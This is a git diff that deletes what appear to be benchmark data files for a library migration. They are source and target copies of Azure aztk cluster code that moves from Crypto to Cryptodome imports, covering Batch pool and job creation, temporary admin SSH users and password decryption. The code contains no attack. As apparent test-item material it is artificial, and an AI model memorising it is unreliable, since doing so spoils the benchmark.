d560b56..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.target.py +++ /dev/null @@ -1,401 +0,0 @@ -import asyncio -import concurrent.futures -from datetime import datetime, timedelta, timezone - -import azure.batch.models as batch_models -import azure.batch.models.batch_error as batch_error -import aztk.utils.azure_api as azure_api -import aztk.utils.constants as constants -import aztk.utils.get_ssh_key as get_ssh_key -import aztk.utils.helpers as helpers -import aztk.utils.ssh as ssh_lib -import aztk.models as models -import azure.batch.models as batch_models -from azure.batch.models import batch_error -from Cryptodome.PublicKey import RSA -from aztk.internal import cluster_data - -class Client: - def __init__(self, secrets_config: models.SecretsConfiguration): - self.secrets_config = secrets_config - - azure_api.validate_secrets(secrets_config) - self.batch_client = azure_api.make_batch_client(secrets_config) - self.blob_client = azure_api.make_blob_client(secrets_config) - - def get_cluster_config(self, cluster_id: str) -> models.ClusterConfiguration: - return self._get_cluster_data(cluster_id).read_cluster_config() - - def _get_cluster_data(self, cluster_id: str) -> cluster_data.ClusterData: - """ - Returns ClusterData object to manage data related to the given cluster id - """ - return cluster_data.ClusterData(self.blob_client, cluster_id) - - ''' - General Batch Operations - ''' - - def __delete_pool_and_job(self, pool_id: str, keep_logs: bool = False): - """ - Delete a pool and it's associated job - :param cluster_id: the pool to add the user to - :return bool: deleted the pool if exists and job if exists - """ - # job id is equal to pool id - job_id = pool_id - job_exists = True - - try: - self.batch_client.job.get(job_id) - except batch_models.batch_error.BatchErrorException: - job_exists = False - - pool_exists = self.batch_client.pool.exists(pool_id) - - if job_exists: - self.batch_client.job.delete(job_id) - - if pool_exists: - self.batch_client.pool.delete(pool_id) - - if not keep_logs: - cluster_data = self._get_cluster_data(pool_id) - cluster_data.delete_container(pool_id) - - return job_exists or pool_exists - - def __create_pool_and_job(self, cluster_conf: models.ClusterConfiguration, software_metadata_key: str, start_task, VmImageModel): - """ - Create a pool and job - :param cluster_conf: the configuration object used to create the cluster - :type cluster_conf: aztk.models.ClusterConfiguration - :parm software_metadata_key: the id of the software being used on the cluster - :param start_task: the start task for the cluster - :param VmImageModel: the type of image to provision for the cluster - :param wait: wait until the cluster is ready - """ - self._get_cluster_data(cluster_conf.cluster_id).save_cluster_config(cluster_conf) - # reuse pool_id as job_id - pool_id = cluster_conf.cluster_id - job_id = cluster_conf.cluster_id - - # Get a verified node agent sku - sku_to_use, image_ref_to_use = \ - helpers.select_latest_verified_vm_image_with_node_agent_sku( - VmImageModel.publisher, VmImageModel.offer, VmImageModel.sku, self.batch_client) - - network_conf = None - if cluster_conf.subnet_id is not None: - network_conf = batch_models.NetworkConfiguration( - subnet_id=cluster_conf.subnet_id) - auto_scale_formula = "$TargetDedicatedNodes={0}; $TargetLowPriorityNodes={1}".format( - cluster_conf.vm_count, cluster_conf.vm_low_pri_count) - - # Confiure the pool - pool = batch_models.PoolAddParameter( - id=pool_id, - virtual_machine_configuration=batch_models.VirtualMachineConfiguration( - image_reference=image_ref_to_use, - node_agent_sku_id=sku_to_use), - vm_size=cluster_conf.vm_size, - enable_auto_scale=True, - auto_scale_formula=auto_scale_formula, - auto_scale_evaluation_interval=timedelta(minutes=5), - start_task=start_task, - enable_inter_node_communication=True if not cluster_conf.subnet_id else False, - max_tasks_per_node=4, - network_configuration=network_conf, - metadata=[ - batch_models.MetadataItem( - name=constants.AZTK_SOFTWARE_METADATA_KEY, value=software_metadata_key), - batch_models.MetadataItem( - name=constants.AZTK_MODE_METADATA_KEY, value=constants.AZTK_CLUSTER_MODE_METADATA) - ]) - - # Create the pool + create user for the pool - helpers.create_pool_if_not_exist(pool, self.batch_client) - - # Create job - job = batch_models.JobAddParameter( - id=job_id, - pool_info=batch_models.PoolInformation(pool_id=pool_id)) - - # Add job to batch - self.batch_client.job.add(job) - - return helpers.get_cluster(cluster_conf.cluster_id, self.batch_client) - - def __get_pool_details(self, cluster_id: str): - """ - Print the information for the given cluster - :param cluster_id: Id of the cluster - :return pool: CloudPool, nodes: ComputeNodePaged - """ - pool = self.batch_client.pool.get(cluster_id) - nodes = self.batch_client.compute_node.list(pool_id=cluster_id) - return pool, nodes - - def __list_clusters(self, software_metadata_key): - """ - List all the cluster on your account. - """ - pools = self.batch_client.pool.list() - software_metadata = ( - constants.AZTK_SOFTWARE_METADATA_KEY, software_metadata_key) - cluster_metadata = ( - constants.AZTK_MODE_METADATA_KEY, constants.AZTK_CLUSTER_MODE_METADATA) - - aztk_pools = [] - for pool in [pool for pool in pools if pool.metadata]: - pool_metadata = [(metadata.name, metadata.value) for metadata in pool.metadata] - if all([metadata in pool_metadata for metadata in [software_metadata, cluster_metadata]]): - aztk_pools.append(pool) - return aztk_pools - - def __create_user(self, pool_id: str, node_id: str, username: str, password: str = None, ssh_key: str = None) -> str: - """ - Create a pool user - :param pool: the pool to add the user to - :param node: the node to add the user to - :param username: username of the user to add - :param password: password of the user to add - :param ssh_key: ssh_key of the user to add - """ - # Create new ssh user for the master node - self.batch_client.compute_node.add_user( - pool_id, - node_id, - batch_models.ComputeNodeUser( - name=username, - is_admin=True, - password=password, - ssh_public_key=get_ssh_key.get_user_public_key( - ssh_key, self.secrets_config), - expiry_time=datetime.now(timezone.utc) + timedelta(days=365))) - - def __delete_user(self, pool_id: str, node_id: str, username: str) -> str: - """ - Create a pool user - :param pool: the pool to add the user to - :param node: the node to add the user to - :param username: username of the user to add - """ - # Delete a user on the given node - self.batch_client.compute_node.delete_user(pool_id, node_id, username) - - - def __get_remote_login_settings(self, pool_id: str, node_id: str): - """ - Get the remote_login_settings for node - :param pool_id - :param node_id - :returns aztk.models.RemoteLogin - """ - result = self.batch_client.compute_node.get_remote_login_settings( - pool_id, node_id) - return models.RemoteLogin(ip_address=result.remote_login_ip_address, port=str(result.remote_login_port)) - - def __create_user_on_node(self, username, pool_id, node_id, ssh_key): - try: - self.__create_user(pool_id=pool_id, node_id=node_id, username=username, ssh_key=ssh_key) - except batch_error.BatchErrorException as error: - try: - self.__delete_user(pool_id, node_id, username) - self.__create_user(pool_id=pool_id, node_id=node_id, username=username, ssh_key=ssh_key) - except batch_error.BatchErrorException as error: - print(error) - raise error - return ssh_key - - def __create_user_on_pool(self, username, pool_id, nodes): - ssh_key = RSA.generate(2048) - ssh_pub_key = ssh_key.publickey().exportKey('OpenSSH').decode('utf-8') - with concurrent.futures.ThreadPoolExecutor() as executor: - futures = {executor.submit(self.__create_user_on_node, - username, - pool_id, - node.id, - ssh_pub_key): node for node in nodes} - concurrent.futures.wait(futures) - return ssh_key - - def __delete_user_on_pool(self, username, pool_id, nodes): - with concurrent.futures.ThreadPoolExecutor() as exector: - futures = [exector.submit(self.__delete_user, pool_id, node.id, username) for node in nodes] - concurrent.futures.wait(futures) - - - def __cluster_run(self, cluster_id, command, internal, container_name=None, timeout=None): - pool, nodes = self.__get_pool_details(cluster_id) - nodes = [node for node in nodes] - if internal: - cluster_nodes = [(node, models.RemoteLogin(ip_address=node.ip_address, port="22")) for node in nodes] - else: - cluster_nodes = [(node, self.__get_remote_login_settings(pool.id, node.id)) for node in nodes] - try: - ssh_key = self.__create_user_on_pool('aztk', pool.id, nodes) - output = asyncio.get_event_loop().run_until_complete(ssh_lib.clus_exec_command(command, - 'aztk', - cluster_nodes, - ssh_key=ssh_key.exportKey().decode('utf-8'), - container_name=container_name, - timeout=timeout)) - return output - except OSError as exc: - raise exc - finally: - self.__delete_user_on_pool('aztk', pool.id, nodes) - - def __cluster_copy(self, cluster_id, source_path, destination_path, container_name=None, internal=False, get=False, timeout=None): - pool, nodes = self.__get_pool_details(cluster_id) - nodes = [node for node in nodes] - if internal: - cluster_nodes = [(node, models.RemoteLogin(ip_address=node.ip_address, port="22")) for node in nodes] - else: - cluster_nodes = [(node, self.__get_remote_login_settings(pool.id, node.id)) for node in nodes] - try: - ssh_key = self.__create_user_on_pool('aztk', pool.id, nodes) - output = asyncio.get_event_loop().run_until_complete( - ssh_lib.clus_copy(container_name=container_name, - username='aztk', - nodes=cluster_nodes, - source_path=source_path, - destination_path=destination_path, - ssh_key=ssh_key.exportKey().decode('utf-8'), - get=get, - timeout=timeout)) - return output - except (OSError, batch_error.BatchErrorException) as exc: - raise exc - finally: - self.__delete_user_on_pool('aztk', pool.id, nodes) - - def __submit_job(self, - job_configuration, - start_task, - job_manager_task, - autoscale_formula, - software_metadata_key: str, - vm_image_model, - application_metadata): - """ - Job Submission - :param job_configuration -> aztk_sdk.spark.models.JobConfiguration - :param start_task -> batch_models.StartTask - :param job_manager_task -> batch_models.TaskAddParameter - :param autoscale forumula -> str - :param software_metadata_key -> str - :param vm_image_model -> aztk_sdk.models.VmImage - :returns None - """ - self._get_cluster_data(job_configuration.id).save_cluster_config(job_configuration.to_cluster_config()) - - # get a verified node agent sku - sku_to_use, image_ref_to_use = \ - helpers.select_latest_verified_vm_image_with_node_agent_sku( - vm_image_model.publisher, vm_image_model.offer, vm_image_model.sku, self.batch_client) - - # set up subnet if necessary - network_conf = None - if job_configuration.subnet_id: - network_conf = batch_models.NetworkConfiguration( - subnet_id=job_configuration.subnet_id) - - # set up a schedule for a recurring job - auto_pool_specification = batch_models.AutoPoolSpecification( - pool_lifetime_option=batch_models.PoolLifetimeOption.job_schedule, - auto_pool_id_prefix=job_configuration.id, - keep_alive=False, - pool=batch_models.PoolSpecification( - display_name=job_configuration.id, - virtual_machine_configuration=batch_models.VirtualMachineConfiguration( - image_reference=image_ref_to_use, - node_agent_sku_id=sku_to_use), - vm_size=job_configuration.vm_size, - enable_auto_scale=True, - auto_scale_formula=autoscale_formula, - auto_scale_evaluation_interval=timedelta(minutes=5), - start_task=start_task, - enable_inter_node_communication=not job_configuration.mixed_mode(), - network_configuration=network_conf, - max_tasks_per_node=4, - metadata=[ - batch_models.MetadataItem( - name=constants.AZTK_SOFTWARE_METADATA_KEY, value=software_metadata_key), - batch_models.MetadataItem( - name=constants.AZTK_MODE_METADATA_KEY, value=constants.AZTK_JOB_MODE_METADATA) - ] - ) - ) - - # define job specification - job_spec = batch_models.JobSpecification( - pool_info=batch_models.PoolInformation(auto_pool_specification=auto_pool_specification), - display_name=job_configuration.id, - on_all_tasks_complete=batch_models.OnAllTasksComplete.terminate_job, - job_manager_task=job_manager_task, - metadata=[ - batch_models.MetadataItem( - name='applications', value=application_metadata) - ] - ) - - # define schedule - schedule = batch_models.Schedule( - do_not_run_until=None, - do_not_run_after=None, - start_window=None, - recurrence_interval=None - ) - - # create job schedule and add task - setup = batch_models.JobScheduleAddParameter( - id=job_configuration.id, - schedule=schedule, - job_specification=job_spec) - - self.batch_client.job_schedule.add(setup) - - return self.batch_client.job_schedule.get(job_schedule_id=job_configuration.id) - - - ''' - Define Public Interface - ''' - - def create_cluster(self, cluster_conf, wait: bool = False): - raise NotImplementedError() - - def create_clusters_in_parallel(self, cluster_confs): - raise NotImplementedError() - - def delete_cluster(self, cluster_id: str): - raise NotImplementedError() - - def get_cluster(self, cluster_id: str): - raise NotImplementedError() - - def list_clusters(self): - raise NotImplementedError() - - def wait_until_cluster_is_ready(self, cluster_id): - raise NotImplementedError() - - def create_user(self, cluster_id: str, username: str, password: str = None, ssh_key: str = None) -> str: - raise NotImplementedError() - - def get_remote_login_settings(self, cluster_id, node_id): - raise NotImplementedError() - - def cluster_run(self, cluster_id, command): - raise NotImplementedError() - - def cluster_copy(self, cluster_id, source_path, destination_path): - raise NotImplementedError() - - def cluster_download(self, cluster_id, source_path, destination_path): - raise NotImplementedError() - - def submit_job(self, job): - raise NotImplementedError() diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.diff b/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.diff deleted file mode 100644 index 3572da8..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.diff +++ /dev/null @@ -1,15 +0,0 @@ -diff --git a/aztk/node_scripts/install/create_user.py b/aztk/node_scripts/install/create_user.py - index 3d16cf39545e39ee52fa350c7f251c2cc8679228..19dde429a702c29bdcf86a69805053ecfd02edee 100644 - --- a/aztk/node_scripts/install/create_user.py - +++ b/aztk/node_scripts/install/create_user.py -@@ -1,8 +1,8 @@ - import os - import azure.batch.models as batch_models - import azure.batch.models.batch_error as batch_error --from Crypto.PublicKey import RSA --from Crypto.Cipher import AES, PKCS1_OAEP -+from Cryptodome.PublicKey import RSA -+from Cryptodome.Cipher import AES, PKCS1_OAEP - from datetime import datetime, timezone, timedelta - import yaml - ''' diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.source.py b/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.source.py deleted file mode 100644 index b87f641..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.source.py +++ /dev/null @@ -1,55 +0,0 @@ -import os -import azure.batch.models as batch_models -import azure.batch.models.batch_error as batch_error -from Crypto.PublicKey import RSA -from Crypto.Cipher import AES, PKCS1_OAEP -from datetime import datetime, timezone, timedelta -import yaml -''' - Creates a user if the user configuration file at $AZTK_WORKING_DIR/user.yaml exists -''' - -def create_user(batch_client): - path = os.path.join(os.environ['AZTK_WORKING_DIR'], "user.yaml") - - if not os.path.isfile(path): - print("No user to create.") - return - - with open(path, 'r', encoding='UTF-8') as file: - user_conf = yaml.load(file.read()) - - try: - password = None if user_conf['ssh-key'] else decrypt_password(user_conf) - - batch_client.compute_node.add_user( - pool_id=os.environ['AZ_BATCH_POOL_ID'], - node_id=os.environ['AZ_BATCH_NODE_ID'], - user=batch_models.ComputeNodeUser( - name=user_conf['username'], - is_admin=True, - password=password, - ssh_public_key=str(user_conf['ssh-key']), - expiry_time=datetime.now(timezone.utc) + timedelta(days=365) - ) - ) - except batch_error.BatchErrorException as e: - print(e) - -def decrypt_password(user_conf): - cipher_text = user_conf['password'] - encrypted_aes_session_key = user_conf['aes_session_key'] - cipher_aes_nonce = user_conf['cipher_aes_nonce'] - tag = user_conf['tag'] - - # Read private key - with open(os.path.join(os.environ['AZTK_WORKING_DIR'], 'id_rsa'), encoding='UTF-8') as f: - private_key = RSA.import_key(f.read()) - # Decrypt the session key with the public RSA key - cipher_rsa = PKCS1_OAEP.new(private_key) - session_key = cipher_rsa.decrypt(encrypted_aes_session_key) - - # Decrypt the data with the AES session key - cipher_aes = AES.new(session_key, AES.MODE_EAX, cipher_aes_nonce) - password = cipher_aes.decrypt_and_verify(cipher_text, tag) - return password.decode("utf-8") diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.target.py b/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.target.py deleted file mode 100644 index 204fec8..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.target.py +++ /dev/null @@ -1,55 +0,0 @@ -import os -import azure.batch.models as batch_models -import azure.batch.models.batch_error as batch_error -from Cryptodome.PublicKey import RSA -from Cryptodome.Cipher import AES, PKCS1_OAEP -from datetime import datetime, timezone, timedelta -import yaml -''' - Creates a user if the user configuration file at $AZTK_WORKING_DIR/user.yaml exists -''' - -def create_user(batch_client): - path = os.path.join(os.environ['AZTK_WORKING_DIR'], "user.yaml") - - if not os.path.isfile(path): - print("No user to create.") - return - - with open(path, 'r', encoding='UTF-8') as file: - user_conf = yaml.load(file.read()) - - try: - password = None if user_conf['ssh-key'] else decrypt_password(user_conf) - - batch_client.compute_node.add_user( - pool_id=os.environ['AZ_BATCH_POOL_ID'], - node_id=os.environ['AZ_BATCH_NODE_ID'], - user=batch_models.ComputeNodeUser( - name=user_conf['username'], - is_admin=True, - password=password, - ssh_public_key=str(user_conf['ssh-key']), - expiry_time=datetime.now(timezone.utc) + timedelta(days=365) - ) - ) - except batch_error.BatchErrorException as e: - print(e) - -def decrypt_password(user_conf): - cipher_text = user_conf['password'] - encrypted_aes_session_key = user_conf['aes_session_key'] - cipher_aes_nonce = user_conf['cipher_aes_nonce'] - tag = user_conf['tag'] - - # Read private key - with open(os.path.join(os.environ['AZTK_WORKING_DIR'], 'id_rsa'), encoding='UTF-8') as f: - private_key = RSA.import_key(f.read()) - # Decrypt the session key with the public RSA key - cipher_rsa = PKCS1_OAEP.new(private_key) - session_key = cipher_rsa.decrypt(encrypted_aes_session_key) - - # Decrypt the data with the AES session key - cipher_aes = AES.new(session_key, AES.MODE_EAX, cipher_aes_nonce) - password = cipher_aes.decrypt_and_verify(cipher_text, tag) - return password.decode("utf-8") diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.diff b/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.diff deleted file mode 100644 index a4c8aae..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.diff +++ /dev/null @@ -1,11 +0,0 @@ -diff --git a/aztk/spark/models/models.py b/aztk/spark/models/models.py - index 3d16cf39545e39ee52fa350c7f251c2cc8679228..19dde429a702c29bdcf86a69805053ecfd02edee 100644 - --- a/aztk/spark/models/models.py - +++ b/aztk/spark/models/models.py -@@ -1,5 +1,5 @@ - from typing import List --from Crypto.PublicKey import RSA -+from Cryptodome.PublicKey import RSA - import azure.batch.models as batch_models - import aztk.models - from aztk import error diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.source.py b/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.source.py deleted file mode 100644 index d234d75..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.source.py +++ /dev/null @@ -1,312 +0,0 @@ -from typing import List -from Crypto.PublicKey import RSA -import azure.batch.models as batch_models -import aztk.models -from aztk import error -from aztk.utils import constants, helpers - -class SparkToolkit(aztk.models.Toolkit): - def __init__(self, version: str, environment: str = None, environment_version: str = None): - super().__init__( - version=version, - environment=environment, - environment_version=environment_version, - ) - - -class Cluster(aztk.models.Cluster): - def __init__(self, pool: batch_models.CloudPool = None, nodes: batch_models.ComputeNodePaged = None): - super().__init__(pool, nodes) - self.master_node_id = self.__get_master_node_id() - self.gpu_enabled = helpers.is_gpu_enabled(pool.vm_size) - - def is_pool_running_spark(self, pool: batch_models.CloudPool): - if pool.metadata is None: - return False - - for metadata in pool.metadata: - if metadata.name == constants.AZTK_SOFTWARE_METADATA_KEY: - return metadata.value == aztk.models.Software.spark - - return False - - def __get_master_node_id(self): - """ - :returns: the id of the node that is the assigned master of this pool - """ - if self.pool.metadata is None: - return None - - for metadata in self.pool.metadata: - if metadata.name == constants.MASTER_NODE_METADATA_KEY: - return metadata.value - - return None - - -class RemoteLogin(aztk.models.RemoteLogin): - pass - - -class File(aztk.models.File): - pass - - -class SparkConfiguration(): - def __init__(self, spark_defaults_conf=None, spark_env_sh=None, core_site_xml=None, jars=None): - self.spark_defaults_conf = spark_defaults_conf - self.spark_env_sh = spark_env_sh - self.core_site_xml = core_site_xml - self.jars = jars - self.ssh_key_pair = self.__generate_ssh_key_pair() - - def __generate_ssh_key_pair(self): - key = RSA.generate(2048) - priv_key = key.exportKey('PEM') - pub_key = key.publickey().exportKey('OpenSSH') - return {'pub_key': pub_key, 'priv_key': priv_key} - - -class CustomScript(aztk.models.CustomScript): - pass - - -class FileShare(aztk.models.FileShare): - pass - - -class UserConfiguration(aztk.models.UserConfiguration): - pass - - -class ServicePrincipalConfiguration(aztk.models.ServicePrincipalConfiguration): - pass - - -class SharedKeyConfiguration(aztk.models.SharedKeyConfiguration): - pass - - -class DockerConfiguration(aztk.models.DockerConfiguration): - pass - -class PluginConfiguration(aztk.models.PluginConfiguration): - pass - - -class ClusterConfiguration(aztk.models.ClusterConfiguration): - def __init__( - self, - custom_scripts: List[CustomScript] = None, - file_shares: List[FileShare] = None, - cluster_id: str = None, - vm_count=0, - vm_low_pri_count=0, - vm_size=None, - subnet_id=None, - toolkit: SparkToolkit = None, - user_configuration: UserConfiguration = None, - spark_configuration: SparkConfiguration = None, - worker_on_master: bool = None): - super().__init__( - custom_scripts=custom_scripts, - cluster_id=cluster_id, - vm_count=vm_count, - vm_low_pri_count=vm_low_pri_count, - vm_size=vm_size, - toolkit=toolkit, - subnet_id=subnet_id, - file_shares=file_shares, - user_configuration=user_configuration, - ) - self.spark_configuration = spark_configuration - self.worker_on_master = worker_on_master - - def merge(self, other): - super().merge(other) - self._merge_attributes(other, ["spark_configuration", "worker_on_master"]) - - -class SecretsConfiguration(aztk.models.SecretsConfiguration): - pass - - -class VmImage(aztk.models.VmImage): - pass - - -class ApplicationConfiguration: - def __init__( - self, - name=None, - application=None, - application_args=None, - main_class=None, - jars=None, - py_files=None, - files=None, - driver_java_options=None, - driver_library_path=None, - driver_class_path=None, - driver_memory=None, - executor_memory=None, - driver_cores=None, - executor_cores=None, - max_retry_count=None): - self.name = name - self.application = application - self.application_args = application_args - self.main_class = main_class - self.jars = jars or [] - self.py_files = py_files or [] - self.files = files or [] - self.driver_java_options = driver_java_options - self.driver_library_path = driver_library_path - self.driver_class_path = driver_class_path - self.driver_memory = driver_memory - self.executor_memory = executor_memory - self.driver_cores = driver_cores - self.executor_cores = executor_cores - self.max_retry_count = max_retry_count - - -class Application: - def __init__(self, cloud_task: batch_models.CloudTask): - self.name = cloud_task.id - self.last_modified = cloud_task.last_modified - self.creation_time = cloud_task.creation_time - self.state = cloud_task.state._value_ - self.state_transition_time = cloud_task.state_transition_time - self.exit_code = cloud_task.execution_info.exit_code - if cloud_task.previous_state: - self.previous_state = cloud_task.previous_state._value_ - self.previous_state_transition_time = cloud_task.previous_state_transition_time - - self._execution_info = cloud_task.execution_info - self._node_info = cloud_task.node_info - self._stats = cloud_task.stats - self._multi_instance_settings = cloud_task.multi_instance_settings - self._display_name = cloud_task.display_name - self._exit_conditions = cloud_task.exit_conditions - self._command_line = cloud_task.command_line - self._resource_files = cloud_task.resource_files - self._output_files = cloud_task.output_files - self._environment_settings = cloud_task.environment_settings - self._affinity_info = cloud_task.affinity_info - self._constraints = cloud_task.constraints - self._user_identity = cloud_task.user_identity - self._depends_on = cloud_task.depends_on - self._application_package_references = cloud_task.application_package_references - self._authentication_token_settings = cloud_task.authentication_token_settings - self._url = cloud_task.url - self._e_tag = cloud_task.e_tag - - -class JobConfiguration: - def __init__( - self, - id, - applications, - vm_size, - custom_scripts=None, - spark_configuration=None, - toolkit=None, - max_dedicated_nodes=0, - max_low_pri_nodes=0, - subnet_id=None, - worker_on_master=None): - self.id = id - self.applications = applications - self.custom_scripts = custom_scripts - self.spark_configuration = spark_configuration - self.vm_size = vm_size - self.gpu_enabled = helpers.is_gpu_enabled(vm_size) - self.toolkit = toolkit - self.max_dedicated_nodes = max_dedicated_nodes - self.max_low_pri_nodes = max_low_pri_nodes - self.subnet_id = subnet_id - self.worker_on_master = worker_on_master - - def to_cluster_config(self): - return ClusterConfiguration( - cluster_id=self.id, - custom_scripts=self.custom_scripts, - toolkit=self.toolkit, - vm_size=self.vm_size, - vm_count=self.max_dedicated_nodes, - vm_low_pri_count=self.max_low_pri_nodes, - subnet_id=self.subnet_id, - worker_on_master=self.worker_on_master, - spark_configuration=self.spark_configuration, - ) - - def mixed_mode(self) -> bool: - return self.max_dedicated_nodes > 0 and self.max_low_pri_nodes > 0 - - def get_docker_repo(self) -> str: - return self.toolkit.get_docker_repo(self.gpu_enabled) - - def validate(self) -> bool: - """ - Validate the config at its current state. - Raises: Error if invalid - """ - if self.toolkit is None: - raise error.InvalidModelError( - "Please supply a toolkit in the cluster configuration") - - self.toolkit.validate() - - if self.id is None: - raise error.AztkError("Please supply an ID for the Job in your configuration.") - - if self.max_dedicated_nodes == 0 and self.max_low_pri_nodes == 0: - raise error.AztkError( - "Please supply a valid (greater than 0) value for either max_dedicated_nodes or max_low_pri_nodes in your configuration." - ) - - if self.vm_size is None: - raise error.AztkError( - "Please supply a vm_size in your configuration." - ) - - if self.mixed_mode() and not self.subnet_id: - raise error.AztkError( - "You must configure a VNET to use AZTK in mixed mode (dedicated and low priority nodes) and pass the subnet_id in your configuration.." - ) - - -class JobState(): - complete = 'completed' - active = "active" - completed = "completed" - disabled = "disabled" - terminating = "terminating" - deleting = "deleting" - - -class Job(): - def __init__(self, cloud_job_schedule: batch_models.CloudJobSchedule, - cloud_tasks: List[batch_models.CloudTask] = None, - pool: batch_models.CloudPool = None, - nodes: batch_models.ComputeNodePaged = None): - self.id = cloud_job_schedule.id - self.last_modified = cloud_job_schedule.last_modified - self.state = cloud_job_schedule.state._value_ - self.state_transition_time = cloud_job_schedule.state_transition_time - self.creation_time = cloud_job_schedule.creation_time - self.applications = [Application(task) for task in (cloud_tasks or [])] - if pool: - self.cluster = Cluster(pool, nodes) - else: - self.cluster = None - - -class ApplicationLog(): - def __init__(self, name: str, cluster_id: str, log: str, total_bytes: int, application_state: batch_models.TaskState, exit_code: int): - self.name = name - self.cluster_id = cluster_id # TODO: change to something cluster/job agnostic - self.log = log - self.total_bytes = total_bytes - self.application_state = application_state - self.exit_code = exit_code diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.target.py b/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.target.py deleted file mode 100644 index 47feba4..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.target.py +++ /dev/null @@ -1,312 +0,0 @@ -from typing import List -from Cryptodome.PublicKey import RSA -import azure.batch.models as batch_models -import aztk.models -from aztk import error -from aztk.utils import constants, helpers - -class SparkToolkit(aztk.models.Toolkit): - def __init__(self, version: str, environment: str = None, environment_version: str = None): - super().__init__( - version=version, - environment=environment, - environment_version=environment_version, - ) - - -class Cluster(aztk.models.Cluster): - def __init__(self, pool: batch_models.CloudPool = None, nodes: batch_models.ComputeNodePaged = None): - super().__init__(pool, nodes) - self.master_node_id = self.__get_master_node_id() - self.gpu_enabled = helpers.is_gpu_enabled(pool.vm_size) - - def is_pool_running_spark(self, pool: batch_models.CloudPool): - if pool.metadata is None: - return False - - for metadata in pool.metadata: - if metadata.name == constants.AZTK_SOFTWARE_METADATA_KEY: - return metadata.value == aztk.models.Software.spark - - return False - - def __get_master_node_id(self): - """ - :returns: the id of the node that is the assigned master of this pool - """ - if self.pool.metadata is None: - return None - - for metadata in self.pool.metadata: - if metadata.name == constants.MASTER_NODE_METADATA_KEY: - return metadata.value - - return None - - -class RemoteLogin(aztk.models.RemoteLogin): - pass - - -class File(aztk.models.File): - pass - - -class SparkConfiguration(): - def __init__(self, spark_defaults_conf=None, spark_env_sh=None, core_site_xml=None, jars=None): - self.spark_defaults_conf = spark_defaults_conf - self.spark_env_sh = spark_env_sh - self.core_site_xml = core_site_xml - self.jars = jars - self.ssh_key_pair = self.__generate_ssh_key_pair() - - def __generate_ssh_key_pair(self): - key = RSA.generate(2048) - priv_key = key.exportKey('PEM') - pub_key = key.publickey().exportKey('OpenSSH') - return {'pub_key': pub_key, 'priv_key': priv_key} - - -class CustomScript(aztk.models.CustomScript): - pass - - -class FileShare(aztk.models.FileShare): - pass - - -class UserConfiguration(aztk.models.UserConfiguration): - pass - - -class ServicePrincipalConfiguration(aztk.models.ServicePrincipalConfiguration): - pass - - -class SharedKeyConfiguration(aztk.models.SharedKeyConfiguration): - pass - - -class DockerConfiguration(aztk.models.DockerConfiguration): - pass - -class PluginConfiguration(aztk.models.PluginConfiguration): - pass - - -class ClusterConfiguration(aztk.models.ClusterConfiguration): - def __init__( - self, - custom_scripts: List[CustomScript] = None, - file_shares: List[FileShare] = None, - cluster_id: str = None, - vm_count=0, - vm_low_pri_count=0, - vm_size=None, - subnet_id=None, - toolkit: SparkToolkit = None, - user_configuration: UserConfiguration = None, - spark_configuration: SparkConfiguration = None, - worker_on_master: bool = None): - super().__init__( - custom_scripts=custom_scripts, - cluster_id=cluster_id, - vm_count=vm_count, - vm_low_pri_count=vm_low_pri_count, - vm_size=vm_size, - toolkit=toolkit, - subnet_id=subnet_id, - file_shares=file_shares, - user_configuration=user_configuration, - ) - self.spark_configuration = spark_configuration - self.worker_on_master = worker_on_master - - def merge(self, other): - super().merge(other) - self._merge_attributes(other, ["spark_configuration", "worker_on_master"]) - - -class SecretsConfiguration(aztk.models.SecretsConfiguration): - pass - - -class VmImage(aztk.models.VmImage): - pass - - -class ApplicationConfiguration: - def __init__( - self, - name=None, - application=None, - application_args=None, - main_class=None, - jars=None, - py_files=None, - files=None, - driver_java_options=None, - driver_library_path=None, - driver_class_path=None, - driver_memory=None, - executor_memory=None, - driver_cores=None, - executor_cores=None, - max_retry_count=None): - self.name = name - self.application = application - self.application_args = application_args - self.main_class = main_class - self.jars = jars or [] - self.py_files = py_files or [] - self.files = files or [] - self.driver_java_options = driver_java_options - self.driver_library_path = driver_library_path - self.driver_class_path = driver_class_path - self.driver_memory = driver_memory - self.executor_memory = executor_memory - self.driver_cores = driver_cores - self.executor_cores = executor_cores - self.max_retry_count = max_retry_count - - -class Application: - def __init__(self, cloud_task: batch_models.CloudTask): - self.name = cloud_task.id - self.last_modified = cloud_task.last_modified - self.creation_time = cloud_task.creation_time - self.state = cloud_task.state._value_ - self.state_transition_time = cloud_task.state_transition_time - self.exit_code = cloud_task.execution_info.exit_code - if cloud_task.previous_state: - self.previous_state = cloud_task.previous_state._value_ - self.previous_state_transition_time = cloud_task.previous_state_transition_time - - self._execution_info = cloud_task.execution_info - self._node_info = cloud_task.node_info - self._stats = cloud_task.stats - self._multi_instance_settings = cloud_task.multi_instance_settings - self._display_name = cloud_task.display_name - self._exit_conditions = cloud_task.exit_conditions - self._command_line = cloud_task.command_line - self._resource_files = cloud_task.resource_files - self._output_files = cloud_task.output_files - self._environment_settings = cloud_task.environment_settings - self._affinity_info = cloud_task.affinity_info - self._constraints = cloud_task.constraints - self._user_identity = cloud_task.user_identity - self._depends_on = 